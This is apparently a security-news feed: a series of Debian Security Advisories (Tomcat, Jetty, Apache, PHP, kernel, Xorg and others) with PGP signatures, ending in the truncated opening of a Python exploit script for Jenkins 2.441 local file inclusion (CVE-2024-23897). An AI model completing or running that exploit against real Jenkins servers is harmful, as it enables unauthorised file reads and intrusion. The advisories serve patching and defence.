Debian Linux Security Advisory 5665-1 - Several security vulnerabilities have been discovered in the Tomcat servlet and JSP engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5665-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
April 17, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tomcat10  
CVE ID         : CVE-2023-46589 CVE-2024-23672 CVE-2024-24549  
Debian Bug     : 1057082 1066877 1066878

Several security vulnerabilities have been discovered in the Tomcat  
servlet and JSP engine.

CVE-2023-46589

    Tomcat 10 did not correctly parse HTTP trailer headers. A trailer header  
    that exceeded the header size limit could cause Tomcat to treat a single  
    request as multiple requests leading to the possibility of request  
    smuggling when behind a reverse proxy.

CVE-2024-24549

     Denial of Service due to improper input validation vulnerability for  
     HTTP/2. When processing an HTTP/2 request, if the request exceeded any of  
     the configured limits for headers, the associated HTTP/2 stream was not  
     reset until after all of the headers had been processed.

CVE-2024-23672

     Denial of Service via incomplete cleanup vulnerability. It was possible  
     for WebSocket clients to keep WebSocket connections open leading to  
     increased resource consumption.

For the stable distribution (bookworm), these problems have been fixed in  
version 10.1.6-1+deb12u2.

We recommend that you upgrade your tomcat10 packages.

For the detailed security status of tomcat10 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tomcat10

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmYgQdpfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRxWg/9HomYTHhhPpVv0BwAECG399S7910TgHArULALOMKdpHjJLmi4PvNoB/u+  
7KwKWdpULjOr4z0YMmxyI6eMHYEgJAEHlZpSzGRt2Sue12g0ouSLJ7//jvfJcI6b  
5JnzFdZQQYoGocfIgHczcKGooMDjaujmTuf/bA2tVV+X5gO0QYWGnbr7MLd0y4PC  
a8KaLGNJcGDSkN2nCFgEi2mMBZP++sEA+TyJJV6cOHyvnXEoD9/wk6IwFos4kDQT  
y3qbYtRGUwtg/frQ7iS8EtkpK8vHcjflPrtQTvfGLALdXV50RpOOgeIIKOecFs2v  
PtJp3dEg4L/cWNlPwLVsisYN6gC+pa6z3GoAg5J2O5d9xar+pJQeYLx9WozlGvkL  
NVVzvj6p30yQOxINtes2xG9pqPOM7alLQl6VjUxm8DVSCne4NKlK32HAyh8Uxi4R  
V+3nqTPRNeN+3bLeztCOeo/9oxSTkXDDqB9TT3rFooZpP3bpaUH2B37lOONcg/55  
+WTTgh8bM8f8MlmOMYqz3IihrxW0WJlgE5oR2vCNwxb8a3ec4GhwdCV5/Sr3LxEJ  
YkURiWyUE37/OuZB/TnTg26HWcctJJpV+//JOTslRWBr0qXIg6PrMIwYYtTYZwXp  
U8mmX8cIQVdHQoFvYrJuQz4J74sjDRIddo5rWB7bXXJQEuxcBrs=  
=WEw1  
-----END PGP SIGNATURE-----

Debian Security Advisory 5665-1

Debian Linux Security Advisory 5664-1 - Jetty 9 is a Java based web server and servlet engine. It was discovered that remote attackers may leave many HTTP/2 connections in ESTABLISHED state (not closed), TCP congested and idle. Eventually the server will stop accepting new connections from valid clients which can cause a denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5664-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanyApril 17, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : jetty9CVE ID         : CVE-2024-22201Jetty 9 is a Java based web server and servlet engine. It was discovered thatremote attackers may leave many HTTP/2 connections in ESTABLISHED state (notclosed), TCP congested and idle. Eventually the server will stop accepting newconnections from valid clients which can cause a denial of service.For the oldstable distribution (bullseye), this problem has been fixedin version 9.4.50-4+deb11u2.For the stable distribution (bookworm), this problem has been fixed inversion 9.4.50-4+deb12u3.We recommend that you upgrade your jetty9 packages.For the detailed security status of jetty9 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/jetty9Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmYgPqhfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeS8Wg/+JvDyNdRq1Tu6rEqfHprMuxVifvPSH4RefpWMVY1MUIwRSxCyL9GEKCtuq0a+Vf/JycNVbTcRB0n/UpgFdCCWE6dUngLIoYX/SmA+dXKLN9a+FIKj/aivOvOrCUEkaJiVBjARYoBxDzoLG8STAJkxJvCAIduOSZ4Pr3iaZ+3+mHLpz38aAHz7QCXSNoqaD66hMTCVPnVTTr3CvrhCIjcdxQRteJwkJ0XxT5WxYSBmVuB+zEAxHUt6ocv25bMel+B4OMcNrRrdQiUtqAF2i7ktAPO2HUo5+9kxYCwkB1DbgIEhdtkA6aBtTYZ0ZJbx4kV206DrQO7PjLzbY6RA2o2EiNb1zEZlaaFuGq6ctIpR52PplC0sEPUTVbDHLlDAQUIXzmmJGhD2etF5dpknbBTcAhUjGebCiasqwZ8HWiVUeIEwi89je7+CThjB3phSjyzqZivdkpYiZTApy3UU3lzXHViCtTIverkaQNoYExWVCKihvMRtSAlhw4b0ukEt+PNzrgl2N0M3bYh1oEh+TGqiP961Je38l5756wKLSxgzfTwTlrPmH6BFwhkFEnMxzjX4jvRWkVC2Yz4/DiJnRnAEjS3iOsvvDnP/lZkWZOXMT3TY0bRJSwUuEgCcNPF/PE/q6KRtzyxJLuTOFRwk/xob/q4GucD+RuqwHEC2w3fN7WE==HK3G-----END PGP SIGNATURE-----

Debian Security Advisory 5664-1

Debian Linux Security Advisory 5655-2 - The update of cockpit released in DSA 5655-1 did not correctly build binary packages due to unit test failures when building against libssh 0.10.6. This update corrects that problem.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5655-2                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
April 16, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : cockpit  
Debian Bug     : 1069059

The update of cockpit released in DSA 5655-1 did not correctly built  
binary packages due to unit test failures when building against libssh  
0.10.6. This update corrects that problem.

For the stable distribution (bookworm), this problem has been fixed in  
version 287.1-0+deb12u2.

We recommend that you upgrade your cockpit packages.

For the detailed security status of cockpit please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/cockpit

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmYe2O9fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QK0RAAkGuh1qsgWCu60JxMYZjfeSyA/w+MlKlwANHCA74QbsvqOyadjrtdxRjK  
EgKRs8Gz7H8o3bpuVE/4mWkIyDjsn9yZeFlro/6wf3yGsxEL7I2MlKWa56A6hNJD  
4dCgdo9gKqcDR7YOpknemN7F8VElUINFjBHzQ6vzm+HMneg4JC3Nhh1TZfNj/trT  
em/LLoMb9VDHutpv8T0OQwt1tgUxfOfxKDFTsLzjxzYwBfAHqJPu/MZrS1kj15iU  
HK9nouDw7hYOx0FzTBhlobNnLod8kYN+McUMkiux84lv8PyYE3sxiDlTYcGeG+0n  
XQ4FHxB6wdolaGKRCwt8t3Bt1uTPvbDYwii6eDmjNLrSFnjbJlfihaVkng9fXb6R  
kfRHRWhcT15/Yv8GmJUAN7/vNlzPEAXkbXmP3O/MmrLymjsyC4p2Oo8PfKn1biK0  
K0s0BrGMd60DvrD6L07ntF0IfF7qoNvYwZLF3ELsXe/h9dlaNtqDHMG2O1OZNB/M  
VYW6S3reytzexMuqUtKPB2kAZeuiIK6iTJNLU7v1ZWPfHp2ApK3yGxTCXrNj3Ufa  
kO7Tw0g6w3xIvlxLjHPZ/V9TxBB75i2PmxQMLIk4VjAMY93I6XmESFhI4Me94oQw  
xYRGVjCCHd8J5Ky4VTgnS66Um2KUkF+nGCZLudTDVeyPzNBh9hk=  
=b5VL  
-----END PGP SIGNATURE-----

Debian Security Advisory 5655-2

Debian Linux Security Advisory 5662-1 - Multiple vulnerabilities have been discovered in the Apache HTTP server, which may result in HTTP response splitting or denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5662-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
April 16, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : apache2  
CVE ID         : CVE-2023-31122 CVE-2023-38709 CVE-2023-43622  
                 CVE-2023-45802 CVE-2024-24795 CVE-2024-27316

Multiple vulnerabilities have been discovered in the Apache HTTP server,  
which may result in HTTP response splitting or denial of service.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.4.59-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.4.59-1~deb12u1.

We recommend that you upgrade your apache2 packages.

For the detailed security status of apache2 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/apache2

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYewy0ACgkQEMKTtsN8  
Tja35g//YmcqUVOEofpDGsuxzNCW4N4w/9UKJ3Qevb+/+1Vr+HiA1YCckFIOAEVe  
Utic9aNRH3ujZpUWMSW4BDAvRma/iirXSEiuPc6C8YAgjFo7olgAhBgvDEKyHsD1  
cRIVk4GkwL/de0axePNugR4bX+N+ZpQkCDm1i9S54L+LoS/n73MJLkY2LIxzxZi0  
SuQ//DiAa7Q6fwN5jl1emRA28KMm72luOndiL7WuO+EdCF8HmkwhQwk0fjryCxru  
9xHu+k/Xk0Xqnl4AXAe9ghCxxb6/sYrYJvIFR0RxNcViRuIwC+ce1TwISYSfUphu  
q8kvfXmllI+FhUGG88KJMLl/7SO1oEEfUEtmWantxmPIjcBbx0fMbWtGxphXlzVW  
/V7w9aqaHg3eBQIg+9EfFIW++/fk9HEHIRU5j98x7Du/KuMJQGv1T+8/diGOSzof  
yGALRvHiTaOZGmgs2d6ng1y3t21/UJbQD7dxsGEigdBxCim62FxPm701nQ+aAdd9  
OWOqJJi48Z9CLpyIqFIF3T1pJ3G2kU9rWocJ1gaJMIH28pimgIMD1pM79uNA9cIl  
uxvmpT+ND9vhI9iCI9in9z6HosrKDlHdTGW8DgYUJmJNVS5QWEr0ivxarhaxff1S  
1xGJrU+t+Bo7mYzhM6vgdOA7YQp13ljMSPPu9dyd+j6W0sFfQUU=  
=GLD7  
-----END PGP SIGNATURE-----

Debian Security Advisory 5662-1

Debian Linux Security Advisory 5661-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in secure cookie bypass, XXE attacks or incorrect validation of password hashes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5661-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 15, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php8.2CVE ID         : CVE-2023-3823 CVE-2023-3824 CVE-2024-2756 CVE-2024-3096Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in secure cookiebypass, XXE attacks or incorrect validation of password hashes.For the stable distribution (bookworm), these problems have been fixed inversion 8.2.18-1~deb12u1.We recommend that you upgrade your php8.2 packages.For the detailed security status of php8.2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php8.2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYdfYMACgkQEMKTtsN8TjbrZxAAotqJ1fIulmY7fP/Ll2Gb/aoswnUqZTNiZH/yrzwX86cggI61EaWXc/JW7O5i7+U4y63ZIl5M6HVFk5bNgnj6Rwl5bT+jz8dbqLKkphIkT0754h1bdXCaW73riiNztNclAITPYMOntY7TEWZuqS2p4cNjUuHYoPiqCLU8ASMoi/z2DHFWBc6uBLRRRqbhbdFbWeekzc6nt+JZmEVD9JLXsh8kO4/f5o1pbCx6pYerWM1Win5AW6ZBSNMd5xO5DTP3F/RX7BEyH7rTQ0y2TRCY4qk2LKG4cojqidgHIpCiTiFiKvk9W3EJZdKebrzHyBgEixzCImvYze68j0M0ruxWiTTozKEn9Tj7DSPNoD+vB6U8kGAqmG3b5q+pw9BSCQ+AZ25HvDqdasH8gaj8Ji4xAhWxVutQRrSbhcf3xKu8Y6taz3ANIRXBmgjEARhK9p4b66KauAxG5GavWQQQprcbzt0deGUK6WkxigQ04l38kIrD9XIXnMHBEH4/Aas8E6zv8+j+18RdPaSGDGTAvuJD/C9GQjWfIvRXYVjUKarlWgtrgDoxGIMlOIHhRwgyJdZzJAx2vAY2o1CYmtIS59zReqwK+rAtogFi2RIoruVPGLccgxcqJOtvJF7MXGBAVp+3Wi4SFK5QHu1ISlngw+LkNJdkz1yXcUVI6vLt0QQEt94==xxUv-----END PGP SIGNATURE-----

Debian Security Advisory 5661-1

Debian Linux Security Advisory 5660-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in secure cookie bypass, XXE attacks or incorrect validation of password hashes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5660-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 15, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php7.4CVE ID         : CVE-2023-3823 CVE-2023-3824 CVE-2024-2756 CVE-2024-3096Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in secure cookiebypass, XXE attacks or incorrect validation of password hashes.For the oldstable distribution (bullseye), these problems have been fixedin version 7.4.33-1+deb11u5.We recommend that you upgrade your php7.4 packages.For the detailed security status of php7.4 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php7.4Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYdfYIACgkQEMKTtsN8Tjavcw//TgnidCQ8c0hut2Ni6PP87fZH1uZZM+gAjUxS46UpNjsDtlu9WwXAxH09+uq0tg/dvKQLkC5W5gnUBiYhiOVoo9U75QP8oK2EYXyswXuEsb9tUhI/hEYr7KYaNHPRbSxZoowi6hKpXXpjoXc/+J9nghykSL9WeADJw4qP6QTclN274IfSujpmx6z+YqApbtW8wzACmHpdvXfCge09NHiN0Z/U8mpd99JBNIYGJGaSDmGNrnGMzBhOms+PTCqQQZPWgWh4RlggNSlslEadGN1huf1KpdHlPvSEfRavmzloX1Vt+XUrJM47nkD3y6y5TtckhGm7horXlskSovkNQZoa5G8NhAT1trzhfP07QJWJBrcc8MZzJQYiwlqZAf/zY8/UcusrJj3Y8BdkfbdWb69PA6sC2qTDuj48p7adgYBZ5YOwmrC4dcwdRd9laGqnZAhk1htX19Gzt1gYL2wDPMU+2x+F0rbemXGS6UwRmrkSlTiWVka+T5y+JpC8lLXFR2dwF2KAdUK4dWPd5QUrNb0Tk9dBcEZuyLRevindp7gCKLx/1y/RsrNxT8b1yW5yUp9jtePFa83+jNyojvURlC0SAgTcwEUhltob4vsTAccZZSza3cxOlqzC7ysNd0TKz20rTZFKreygYyIXfmHHaWoYbiK5IEy1ogOVho9SXUYJ7Mc==ZcwU-----END PGP SIGNATURE-----

Debian Security Advisory 5660-1

Debian Linux Security Advisory 5659-1 - Bartek Nowotarski discovered that Apache Traffic Server, a reverse and forward proxy server, was susceptible to denial of service via HTTP2 continuation frames.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5659-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 14, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : trafficserverCVE ID         : CVE-2024-31309Bartek Nowotarski discovered that Apache Traffic Server, a reverse andforward proxy server, was susceptible to denial of service via HTTP2continuation frames.For the oldstable distribution (bullseye), this problem has been fixedin version 8.1.10+ds-1~deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 9.2.4+ds-0+deb12u1.We recommend that you upgrade your trafficserver packages.For the detailed security status of trafficserver please refer toits security tracker page at:https://security-tracker.debian.org/tracker/trafficserverFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYcGbUACgkQEMKTtsN8TjZEQw//YeLDMyZ2KnFxSaZbRAv/UkFNmOsYEwNtYn7xDTdogl3jRWNgqye4wwK2IHB9H4r3n91yBEmQ8CeRTMk07/VI1salyaXHPy5lCK+FuBEp4g5pWT6aCAb6z1KWxfD7AUzFbnLOvLCINvNcnDrYQAn+qaVUxXaD4ArvzjFEfw+AMDNCEnRsiQs83lPzDr5Bm48WYK9MAJteuDoFbWYHjcpyY0ZNxj7VtZP6cSKBqDXcPOjaUZysJjDX3cXqCHEioz3X35SJa+GckVD90h7wzDSHZSaDflUVLc4wwZ5ZNZkzOBKwCvurh52f79hVVjRjlO9UzY+VNuBOqtgP8nX9ByTNDkcsa7Rojgv56km58OIheALPoDHJiTpEWt2CPhxwV3oFYNQzBu2akbCdW+s+ir8p4uS4BxK6B6gz+lfnFuQ+L1MIJtlSDoPu08IYf79aYJKMA33+hXL1rjCggWu1EfofQpQMB/yJkxK/dN4A2xKI91XJshIUPQAcScjDHYnomfBAPzcbiRlYgjJS9WXR7gckX5fKjR9MPOD4t9vaGpy+wMARAFNRxCVBnl/QLsRkpwoAznbqGknXtWsbqNjhkRaLIpLG29YS6gBD4c4D8Q5WKgU7hNC+m4ZZK49u495fwFbQi2nVzn3boCTNIeJDvqrZ0pRePIl97zjzyhxg8PFrgLA==XO+d-----END PGP SIGNATURE-----

Debian Security Advisory 5659-1

Debian Linux Security Advisory 5658-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5658-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
April 13, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-2176 CVE-2023-6270 CVE-2023-7042 CVE-2023-28746  
                 CVE-2023-47233 CVE-2023-52429 CVE-2023-52434 CVE-2023-52435  
                 CVE-2023-52583 CVE-2023-52584 CVE-2023-52587 CVE-2023-52588  
                 CVE-2023-52589 CVE-2023-52593 CVE-2023-52594 CVE-2023-52595  
                 CVE-2023-52597 CVE-2023-52598 CVE-2023-52599 CVE-2023-52600  
                 CVE-2023-52601 CVE-2023-52602 CVE-2023-52603 CVE-2023-52604  
                 CVE-2023-52606 CVE-2023-52607 CVE-2023-52616 CVE-2023-52617  
                 CVE-2023-52618 CVE-2023-52619 CVE-2023-52620 CVE-2023-52621  
                 CVE-2023-52622 CVE-2023-52623 CVE-2023-52630 CVE-2023-52631  
                 CVE-2023-52632 CVE-2023-52633 CVE-2023-52635 CVE-2023-52637  
                 CVE-2023-52638 CVE-2023-52639 CVE-2023-52640 CVE-2023-52641  
                 CVE-2024-0340 CVE-2024-0841 CVE-2024-1151 CVE-2024-2201  
                 CVE-2024-22099 CVE-2024-23850 CVE-2024-23851 CVE-2024-24857  
                 CVE-2024-24858 CVE-2024-26581 CVE-2024-26582 CVE-2024-26583  
                 CVE-2024-26584 CVE-2024-26585 CVE-2024-26586 CVE-2024-26590  
                 CVE-2024-26593 CVE-2024-26600 CVE-2024-26601 CVE-2024-26602  
                 CVE-2024-26603 CVE-2024-26606 CVE-2024-26621 CVE-2024-26622  
                 CVE-2024-26625 CVE-2024-26626 CVE-2024-26627 CVE-2024-26629  
                 CVE-2024-26639 CVE-2024-26640 CVE-2024-26641 CVE-2024-26642  
                 CVE-2024-26643 CVE-2024-26651 CVE-2024-26654 CVE-2024-26659  
                 CVE-2024-26660 CVE-2024-26663 CVE-2024-26664 CVE-2024-26665  
                 CVE-2024-26667 CVE-2024-26671 CVE-2024-26673 CVE-2024-26675  
                 CVE-2024-26676 CVE-2024-26679 CVE-2024-26680 CVE-2024-26681  
                 CVE-2024-26684 CVE-2024-26685 CVE-2024-26686 CVE-2024-26687  
                 CVE-2024-26688 CVE-2024-26689 CVE-2024-26695 CVE-2024-26696  
                 CVE-2024-26697 CVE-2024-26698 CVE-2024-26700 CVE-2024-26702  
                 CVE-2024-26704 CVE-2024-26706 CVE-2024-26707 CVE-2024-26710  
                 CVE-2024-26712 CVE-2024-26714 CVE-2024-26715 CVE-2024-26717  
                 CVE-2024-26718 CVE-2024-26720 CVE-2024-26722 CVE-2024-26723  
                 CVE-2024-26726 CVE-2024-26727 CVE-2024-26731 CVE-2024-26733  
                 CVE-2024-26735 CVE-2024-26736 CVE-2024-26737 CVE-2024-26741  
                 CVE-2024-26742 CVE-2024-26743 CVE-2024-26744 CVE-2024-26745  
                 CVE-2024-26747 CVE-2024-26748 CVE-2024-26749 CVE-2024-26750  
                 CVE-2024-26751 CVE-2024-26752 CVE-2024-26753 CVE-2024-26754  
                 CVE-2024-26759 CVE-2024-26760 CVE-2024-26761 CVE-2024-26763  
                 CVE-2024-26764 CVE-2024-26765 CVE-2024-26766 CVE-2024-26769  
                 CVE-2024-26771 CVE-2024-26772 CVE-2024-26773 CVE-2024-26774  
                 CVE-2024-26775 CVE-2024-26776 CVE-2024-26777 CVE-2024-26778  
                 CVE-2024-26779 CVE-2024-26780 CVE-2024-26781 CVE-2024-26782  
                 CVE-2024-26787 CVE-2024-26788 CVE-2024-26789 CVE-2024-26790  
                 CVE-2024-26791 CVE-2024-26792 CVE-2024-26793 CVE-2024-26795  
                 CVE-2024-26798 CVE-2024-26800 CVE-2024-26801 CVE-2024-26802  
                 CVE-2024-26803 CVE-2024-26804 CVE-2024-26805 CVE-2024-26809  
                 CVE-2024-26810 CVE-2024-26811 CVE-2024-26812 CVE-2024-26813  
                 CVE-2024-26814 CVE-2024-26815 CVE-2024-26816 CVE-2024-27437

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.85-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmYaIyZfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RN3A/9HbzpFDgN8uqJJVEHYgDh38m+h/8maSC2qL3G9ZPEckWX6MLBm+yBWcJ0  
l/DesFcqc5Lh25bgWSO2jJ4TY4+dbTRFzFcJ/aTnbOKGoGCUQt0W9ZHFVwmkPKQN  
tbZm1W1K3u/5dz8qow1ntsQuBarD0uDpImbhOZdrk+n88yKVB4lqAqNgel6EPt03  
6SYAz/A3S1A3cgTEwz9udrA6du7yX/2vFwd9g4CO96VflHBgsHSnWAnmJZScZjIA  
MT8jWGEXUw0zPg78w6AieLWhXTRe/bRxzhPRtYMOwXu1rX3wcPO8cbF9+hgbdj9w  
VD+qKTP3PWzP7nxJ3KLRUf8NvHjOI5CvVJFR3UFVlOE+BtYO//POTZI9eUv9tU3x  
vqXXTuHN+uXHkOtvRImx0Hf6FxjQbdh6IuvK6ipb/YH6IE2jZOw94AYi75UkDkgf  
VBbQf7eShv81Z05tZQo1rFHQMYBbGjtpudJllQ8/zmbv+hM9WuL4NCkw6EQytFPU  
51lVn/8Cqx1wt0IAmKr4FQ3hz/d766jgQvByFQWhqs1ZD7vQy2SxbzzTsKT1Zlha  
GsRB5LNZXvIwZi/A4ls7+4YM4urbRljMFgU7sUaNl+nbhqcw0y/AoLcUGO+7vl6L  
S/9Mmm8mnmXvTTYCgw9tuLo/wCP9UlF5PTEsZTQyslJYVxu/bvQ=  
=IM/D  
-----END PGP SIGNATURE-----

Debian Security Advisory 5658-1txt

Debian Linux Security Advisory 5657-1 - Several vulnerabilities were discovered in the Xorg X server, which may result in privilege escalation if the X server is running privileged or denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5657-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
April 12, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : xorg-server  
CVE ID         : CVE-2024-31080 CVE-2024-31081 CVE-2024-31083

Several vulnerabilities were discovered in the Xorg X server, which may  
result in privilege escalation if the X server is running privileged  
or denial of service.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2:1.20.11-1+deb11u13.

For the stable distribution (bookworm), these problems have been fixed in  
version 2:21.1.7-3+deb12u7.

We recommend that you upgrade your xorg-server packages.

For the detailed security status of xorg-server please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/xorg-server

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmYZmfJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Qz4w//cyMczPAsPfqta3Jcw9cclEKJ2EC6p7c1SWm3c16rHyL+pOfcFsNuUrCR  
H+JPZ8x2qSk5MSJ1AFC4WUJptZup9WlTIfdSNtPJ/T+uweDpEbMGp0dl2DNu5AIP  
riPtam1aVHUsOr7rT4EzBcRK6hZSltgKZjBeu5vdZLDpexOrGTBx6KmjB62+G21P  
3/pog2OVvGi3x6PBsQizEQRW4RP8UsfLEt2EaCxgZKlR+4lfbaSyrKFXolSSbtUR  
lRur+6dy4569c2Ja844W1MFAtXPre6iFLzhwQNuagwTo4V8OqPAi1vjIpjg/vE2S  
s9icZpqJMnFuAEvqoUQ9h5hByZtvGYOxoj8xbT5HCwIzro3K2+eEUpPCBZDqfdxh  
46a7cShJSPzPSgMaZDhi3+BnmmK5GN/cuaUD9YMm2o5JkRxrRjOyo0P/1yvLAV4/  
66XCXbWFUkLNVAi2Z+VI8vJ+cndQ5x1sSxv8HbNTpDSYeazoUFcvfwvFyok+HQYt  
OUu22K/TR7ejYGCWXEg/WOqQxgPk63IB2JvuyGRkshis5gKtOstUjPIpvsGpevq+  
dMuvY63hnZkJYhqTV9nD0YUg7+H6GznxRcOG/YQmzmpu9htpaotmwCucRi2tAS6A  
v4Vd90kzBGPcatElBnPkulj9piI+nFaQT40y5ekG8bXVdCYgDQM=  
=Hr75  
-----END PGP SIGNATURE-----

Debian Security Advisory 5657-1

Jenkins version 2.441 suffers from a local file inclusion vulnerability.

# Exploit Title: Jenkins 2.441 - Local File Inclusion  
# Date: 14/04/2024  
# Exploit Author: Matisse Beckandt (Backendt)  
# Vendor Homepage: https://www.jenkins.io/  
# Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip  
# Version: 2.441  
# Tested on: Debian 12 (Bookworm)  
# CVE: CVE-2024-23897

from argparse import ArgumentParser  
from requests import Session, post, exceptions  
from threading import Thread  
from uuid import uuid4  
from time import sleep  
from re import findall

class Exploit(Thread):  
  def __init__(self, url: str, identifier: str):  
    Thread.__init__(self)  
    self.daemon = True  
    self.url = url  
    self.params = {"remoting": "false"}  
    self.identifier = identifier  
    self.stop_thread = False  
    self.listen = False

  def run(self):  
    while not self.stop_thread:  
